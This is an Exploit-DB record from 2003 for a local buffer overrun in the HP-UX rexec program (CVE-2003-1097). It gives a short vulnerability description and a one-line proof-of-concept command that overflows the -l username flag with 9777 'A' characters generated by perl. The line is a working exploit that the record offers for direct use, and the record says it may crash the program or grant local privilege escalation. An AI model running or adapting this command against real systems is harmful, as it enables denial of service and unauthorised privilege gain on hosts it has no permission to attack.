HP-UX 10.x/11.x RExec Remote Username Flag Local Buffer Overrun Vulnerability

2003-04-29T00:00:00
ID EDB-ID:22552
Type exploitdb
Reporter Davide Del Vecchio
Modified 2003-04-29T00:00:00

Description

HP-UX 10.x/11.x RExec Remote Username Flag Local Buffer Overrun Vulnerability. CVE-2003-1097. Dos exploit for hp-ux platform

                                        
                                            source: http://www.securityfocus.com/bid/7459/info

It has been reported that a problem in the rexec program included with some versions of HP-UX may be vulnerable to a boundary condition error. It may be possible for a local user to exploit this vulnerability to gain elevated privileges on the system. 

exec 127.0.0.1 -l `perl -e 'printf "A" x 9777'` -n something